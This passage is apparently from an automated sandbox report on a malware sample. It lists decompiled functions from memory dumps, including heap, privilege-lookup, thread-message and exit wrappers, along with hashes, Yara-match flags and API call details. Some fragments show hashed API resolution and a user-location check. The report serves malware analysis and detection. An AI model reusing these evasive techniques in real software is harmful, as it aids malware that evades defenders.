                                                                                                                        • Instruction Fuzzy Hash: F590026161100442414071B988489164045BBE1291791D121A4988550DC599887567A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 58ac7dce23c15ef95b85e56ac6146eaee2dce030b59d81c16bd1f7138bf68b93
                                                                                                                        • Instruction ID: c10ac283ad08248e22ac0aece4082959b566b56021fa16464cf7b40defe03824
                                                                                                                        • Opcode Fuzzy Hash: 58ac7dce23c15ef95b85e56ac6146eaee2dce030b59d81c16bd1f7138bf68b93
                                                                                                                        • Instruction Fuzzy Hash: 2490027121140802D10061A9481871B0045A7D0382F91D011A5154555DC665886176B1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: a5e44cc3dc4d940861b30882fb677a82d67af69da389cf64515c6b6fef2bcd9a
                                                                                                                        • Instruction ID: f5104b7814b4747096bab213a5f66d56394dc7a46eab47b998b228b43952b1e6
                                                                                                                        • Opcode Fuzzy Hash: a5e44cc3dc4d940861b30882fb677a82d67af69da389cf64515c6b6fef2bcd9a
                                                                                                                        • Instruction Fuzzy Hash: 0390027121100C02D18071A9440865A0045A7D1381FD1D015A4015654DCA558A6977E1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: fd94ec306da9d0dd592db2bb2365a9f41bc08ddfe08cf41eb65c54ef3f9be9cb
                                                                                                                        • Instruction ID: d586bbe945b3705c62e594dc4bf2eec452e9ad70ed1c8f1ce9e09f7b37d6f366
                                                                                                                        • Opcode Fuzzy Hash: fd94ec306da9d0dd592db2bb2365a9f41bc08ddfe08cf41eb65c54ef3f9be9cb
                                                                                                                        • Instruction Fuzzy Hash: 5390026122180442D20065B94C18B170045A7D0383F91D115A4144554CC95588716661
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 09276cd0d9bc371b6643490dfaa232724aa65951e2506496731d21e6a4a597dd
                                                                                                                        • Instruction ID: 2ccbad01c81c3ae5fe50f71b785b0bee26ebca1aec259c692e9bee3e384fcc8c
                                                                                                                        • Opcode Fuzzy Hash: 09276cd0d9bc371b6643490dfaa232724aa65951e2506496731d21e6a4a597dd
                                                                                                                        • Instruction Fuzzy Hash: 1E90027121108C02D11061A9840875A0045A7D0381F95D411A8414658DC6D588A17261
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004098D2 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        C-Code - Quality: 76%
                                                                                                                        			E004098D2(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __ebx;
				void* _t13;
				int _t15;
				long _t28;
				int _t31;
				void* _t34;
				void* _t36;
				void* _t41;

				_t41 = __eflags;
				asm("adc dl, [ebp-0x75]");
				_t34 = _t36;
				_v68 = 0;
				E00420253( &_v67, 0, 0x3f);
				E00420CF3( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF43(_a4, _t41, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419623(_a4 + 0x20, _t13, 0, 0, E00402E43(0x5c495c56));
				_t31 = _t15;
				if(_t31 != 0) {
					_t28 = _a8;
					_t15 = PostThreadMessageW(_t28, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t15 =  *_t31(_t28, 0x8003, _t34 + (E0040C613(1, 8, _t19 + 0x2c0) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}













                                                                                                                        0x004098d2
                                                                                                                        0x004098d2
                                                                                                                        0x004098d4
                                                                                                                        0x004098e4
                                                                                                                        0x004098e8
                                                                                                                        0x004098f3
                                                                                                                        0x004098f8
                                                                                                                        0x00409903
                                                                                                                        0x0040991b
                                                                                                                        0x00409920
                                                                                                                        0x00409927
                                                                                                                        0x00409929
                                                                                                                        0x00409936
                                                                                                                        0x0040993a
                                                                                                                        0x0040995e
                                                                                                                        0x0040995e
                                                                                                                        0x0040993a
                                                                                                                        0x00409966

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(00001EBF,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409936
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1836367815-0
                                                                                                                        • Opcode ID: 77041cf7cd0e1c177ec7ae717f1160b762fc28cd8b7e72b4706b827f42cc9b32
                                                                                                                        • Instruction ID: 0c664d6520c7f2a03bfe9934e81cf7d6e9675f193e45b60af4ef13180269e2da
                                                                                                                        • Opcode Fuzzy Hash: 77041cf7cd0e1c177ec7ae717f1160b762fc28cd8b7e72b4706b827f42cc9b32
                                                                                                                        • Instruction Fuzzy Hash: D9012B71A4021876E72193A5DC87FEF3B6C9B40B54F14012EFF04BA1C2D6E86E0583E9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004098D3 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 107 4098d3-4098e4 108 4098ed-409927 call 420cf3 call 40cf43 call 402e43 call 419623 107->108 109 4098e8 call 420253 107->109 118 409960-409966 108->118 119 409929-40993a PostThreadMessageW 108->119 109->108 119->118 120 40993c-40995d call 40c613 119->120 120->118
                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E004098D3(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __ebx;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E00420253( &_v67, 0, 0x3f);
				E00420CF3( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF43(_a4, _t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E00419623(_a4 + 0x20, _t13, 0, 0, E00402E43(0x5c495c56));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C613(1, 8, _t19 + 0x2c0) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












                                                                                                                        0x004098d3
                                                                                                                        0x004098e4
                                                                                                                        0x004098e8
                                                                                                                        0x004098f3
                                                                                                                        0x004098f8
                                                                                                                        0x00409903
                                                                                                                        0x0040991b
                                                                                                                        0x00409920
                                                                                                                        0x00409927
                                                                                                                        0x00409929
                                                                                                                        0x00409936
                                                                                                                        0x0040993a
                                                                                                                        0x00000000
                                                                                                                        0x0040995e
                                                                                                                        0x0040993a
                                                                                                                        0x00409966

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(00001EBF,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409936
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1836367815-0
                                                                                                                        • Opcode ID: d6a324dedc1708dab4adf488954d2aa4f481b72ae61f9d1956c5abe9d050d6cc
                                                                                                                        • Instruction ID: e6e37173c2f1226d3c8af67636e72843f565bc4470a0197320473d9e2abf3adc
                                                                                                                        • Opcode Fuzzy Hash: d6a324dedc1708dab4adf488954d2aa4f481b72ae61f9d1956c5abe9d050d6cc
                                                                                                                        • Instruction Fuzzy Hash: 2B019B71A4021876E721A695DC86FEF776C9B40B54F14016EFF047A1C2D6E86E0543F9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041EAB8 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 145 41eab8-41eabb 146 41ea99-41ea9c 145->146 147 41eabd-41eadc 145->147 148 41eaa2-41eab7 LookupPrivilegeValueW 146->148 149 41ea9d call 41f283 146->149 150 41eae2-41eaf3 147->150 151 41eadd call 41f283 147->151 149->148 151->150
                                                                                                                        APIs
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EAB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3899507212-0
                                                                                                                        • Opcode ID: 98140b7bf2c095724278e427e05cf765da8b2d605f86a2d43e63c91e94b5b6dd
                                                                                                                        • Instruction ID: 784a016b8e54a8ee9859cbf4a0e016d5f3eda81aff6223fa4e095363d71397aa
                                                                                                                        • Opcode Fuzzy Hash: 98140b7bf2c095724278e427e05cf765da8b2d605f86a2d43e63c91e94b5b6dd
                                                                                                                        • Instruction Fuzzy Hash: FAF081B5648205ABCB10DF95DC45EE77BA9EF89354F104559FD4C97242D6329810C6A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E91D Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 162 41e91d-41e93a call 41f283 164 41e93f-41e954 RtlFreeHeap 162->164
                                                                                                                        C-Code - Quality: 82%
                                                                                                                        			E0041E91D(void* __eax, intOrPtr _a6, void* _a10, long _a14, void* _a18) {
				char _t13;
				signed char* _t16;

				_pop(_t16);
				 *_t16 =  *_t16 >> 0x79;
				_t10 = _a6;
				_t5 = _t10 + 0xaa0; // 0xaa0
				E0041F283( *((intOrPtr*)(_a6 + 0x14)), _t10, _t5,  *((intOrPtr*)(_a6 + 0x14)), 0, 0x35);
				_t13 = RtlFreeHeap(_a10, _a14, _a18); // executed
				return _t13;
			}





                                                                                                                        0x0041e91d
                                                                                                                        0x0041e91f
                                                                                                                        0x0041e926
                                                                                                                        0x0041e932
                                                                                                                        0x0041e93a
                                                                                                                        0x0041e950
                                                                                                                        0x0041e954

                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,A7C61EA8,00000000,?), ref: 0041E950
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: 05ec137f4eb2703ed3c41cf4bd0cd4ba955118acd393f02e50569f8d6212b945
                                                                                                                        • Instruction ID: 799634709f12ea910003da4cf3ee8ea8e629235eac907803a1c76ed77d587900
                                                                                                                        • Opcode Fuzzy Hash: 05ec137f4eb2703ed3c41cf4bd0cd4ba955118acd393f02e50569f8d6212b945
                                                                                                                        • Instruction Fuzzy Hash: 69E065B56002056BDB14DF84DC45FA73BA8AF89354F004098FE495B292C270E900CAE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004100C3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 165 4100c3-4100e7 call 419623 168 4100e9-4100ea 165->168 169 4100eb-4100fc GetUserGeoID 165->169
                                                                                                                        C-Code - Quality: 37%
                                                                                                                        			E004100C3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419623(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                                                                        0x004100dd
                                                                                                                        0x004100e7
                                                                                                                        0x004100ed
                                                                                                                        0x004100fc
                                                                                                                        0x004100ea
                                                                                                                        0x004100ea
                                                                                                                        0x004100ea

                                                                                                                        APIs
                                                                                                                        • GetUserGeoID.KERNELBASE(00000010), ref: 004100ED
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: User
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 765557111-0
                                                                                                                        • Opcode ID: 959825926c59bb5670012e2e2a6cedfad3f46c8924c70514a6daeba164646bbb
                                                                                                                        • Instruction ID: 3a563afc0cafe54a0c8bc704818cad1181b6210b35aabeb54db6e29b024d66ec
                                                                                                                        • Opcode Fuzzy Hash: 959825926c59bb5670012e2e2a6cedfad3f46c8924c70514a6daeba164646bbb
                                                                                                                        • Instruction Fuzzy Hash: D8E0C27378030427F62492A59C46FAA364E5B84B00F048475F90CE62C1D598E8C00024
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E8E3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 170 41e8e3-41e914 call 41f283 RtlAllocateHeap
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0041E8E3(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F283( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                        0x0041e8f2
                                                                                                                        0x0041e8fa
                                                                                                                        0x0041e910
                                                                                                                        0x0041e914

                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00418CD9,?,00419480,00419480,?,00418CD9,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E910
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                        • Instruction ID: 5ddbcb01e15a2d7ed747f417ea7e92491963252e56502093c6ae518235bfae9c
                                                                                                                        • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                        • Instruction Fuzzy Hash: 32E046B6600208ABCB14EF89DC45EE737ADEF88764F018059FE085B242C630F914CAF1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E923 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 173 41e923-41e939 174 41e93f-41e954 RtlFreeHeap 173->174 175 41e93a call 41f283 173->175 175->174
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0041E923(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F283( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                        0x0041e932
                                                                                                                        0x0041e93a
                                                                                                                        0x0041e950
                                                                                                                        0x0041e954

                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,A7C61EA8,00000000,?), ref: 0041E950
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                        • Instruction ID: ffdd59fa8a5f434a1826a63ca50046247e663d25442e4da7ad111057c7b90ed4
                                                                                                                        • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                        • Instruction Fuzzy Hash: F9E012B5600208ABCB14EF89DC49EA737ADAF88754F018059BA095B292C630E914CAF1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041EA83 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 176 41ea83-41eab7 call 41f283 LookupPrivilegeValueW
                                                                                                                        APIs
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EAB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3899507212-0
                                                                                                                        • Opcode ID: 0dd5c685e1874df30b2addd3f80a4aa29a87ccbaef3a6478d6329e4af8d3a8c0
                                                                                                                        • Instruction ID: f562766203e307b93fbdef18d698a681ef8110e2edcb01b5e07d82ccb2207cbc
                                                                                                                        • Opcode Fuzzy Hash: 0dd5c685e1874df30b2addd3f80a4aa29a87ccbaef3a6478d6329e4af8d3a8c0
                                                                                                                        • Instruction Fuzzy Hash: C0E01AB56002086BC710DF89CC45EE737ADAF88654F014069BA0857242D635E8158AF5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E957 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 53%
                                                                                                                        			E0041E957(intOrPtr _a4, int _a8) {
				void* _t7;
				signed char _t11;
				intOrPtr* _t15;

				_pop(_t19);
				 *_t15 =  *_t15 + _t7;
				asm("fcmovu st0, st4");
				 *(_t11 + 0x55a0ffec) =  *(_t11 + 0x55a0ffec) >> _t11;
				asm("in al, dx");
				_t8 = _a4;
				E0041F283( *((intOrPtr*)(_a4 + 0x53c)), _t8, _t8 + 0xaa8,  *((intOrPtr*)(_a4 + 0x53c)), 0, 0x36);
				ExitProcess(_a8);
			}






                                                                                                                        0x0041e959
                                                                                                                        0x0041e95a
                                                                                                                        0x0041e95c
                                                                                                                        0x0041e95e
                                                                                                                        0x0041e965
                                                                                                                        0x0041e966
                                                                                                                        0x0041e97d
                                                                                                                        0x0041e98b

                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E98B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: a895fe33499fe079dee6b0ea451b37d4e140aea224e6d754df7d51a3db662e27
                                                                                                                        • Instruction ID: 69bce7aeebc043510b4ca084897fd1ea8133fe2b32ddf1b8c91e56ff48bbd5a2
                                                                                                                        • Opcode Fuzzy Hash: a895fe33499fe079dee6b0ea451b37d4e140aea224e6d754df7d51a3db662e27
                                                                                                                        • Instruction Fuzzy Hash: 54E02631A043407BC311DF54CC41FC73BA88F05684F1084A9B9486B283C236EA05CFD0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E963 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 68%
                                                                                                                        			E0041E963(intOrPtr _a4, int _a8) {

				asm("in al, dx");
				_t5 = _a4;
				E0041F283( *((intOrPtr*)(_a4 + 0x53c)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x53c)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                                        0x0041e965
                                                                                                                        0x0041e966
                                                                                                                        0x0041e97d
                                                                                                                        0x0041e98b

                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E98B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: d4c90d3e45517c8e3021a2241b535cb193ad997e7d30957b83dd4f4f6fad69db
                                                                                                                        • Instruction ID: 21ea405293457d8e114c5bb226e18bdc6230d90548aa5f8a76952c56d676509e
                                                                                                                        • Opcode Fuzzy Hash: d4c90d3e45517c8e3021a2241b535cb193ad997e7d30957b83dd4f4f6fad69db
                                                                                                                        • Instruction Fuzzy Hash: 92D012756402147BC620EB99DC45FD7779CDF45694F0180A5BA4C5B241C575BA00CBE1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041E915 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 68%
                                                                                                                        			E0041E915() {
				void* _t14;

				asm("in al, dx");
				_t7 =  *((intOrPtr*)(_t14 + 8));
				E0041F283( *((intOrPtr*)( *((intOrPtr*)(_t14 + 8)) + 0x53c)), _t7, _t7 + 0xaa8,  *((intOrPtr*)( *((intOrPtr*)(_t14 + 8)) + 0x53c)), 0, 0x36);
				ExitProcess( *(_t14 + 0xc));
			}




                                                                                                                        0x0041e965
                                                                                                                        0x0041e966
                                                                                                                        0x0041e97d
                                                                                                                        0x0041e98b

                                                                                                                        APIs
                                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E98B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qhcqh.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 621844428-0
                                                                                                                        • Opcode ID: 7341919db3b733049bce744ae5bd1f434df6f02c6a8323d3da1e10e810b521b8
                                                                                                                        • Instruction ID: a203579782ed1c98eda36f627224feb70fd5e3cdfb63095a93e49c6eaa3c7126
                                                                                                                        • Opcode Fuzzy Hash: 7341919db3b733049bce744ae5bd1f434df6f02c6a8323d3da1e10e810b521b8
                                                                                                                        • Instruction Fuzzy Hash: 42D0C274600100BBC720DF94CC48FD33B989F09350F1084657908AB241C134AB01CBD5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 012D967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_1270000_qhcqh.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 02b851c8029244150da876d55af232523abaac7950330930f4d90e93dac7489d
                                                                                                                        • Instruction ID: 935b644606e7baadf3802b301e78e7ee59a0614f5ccada480fb7e48290d437df
                                                                                                                        • Opcode Fuzzy Hash: 02b851c8029244150da876d55af232523abaac7950330930f4d90e93dac7489d
                                                                                                                        • Instruction Fuzzy Hash: 54B09B719114C5C9DA11D7B4460C727794077D0745F56C051E2020645B4778C4D1F7F5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00C564EA Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
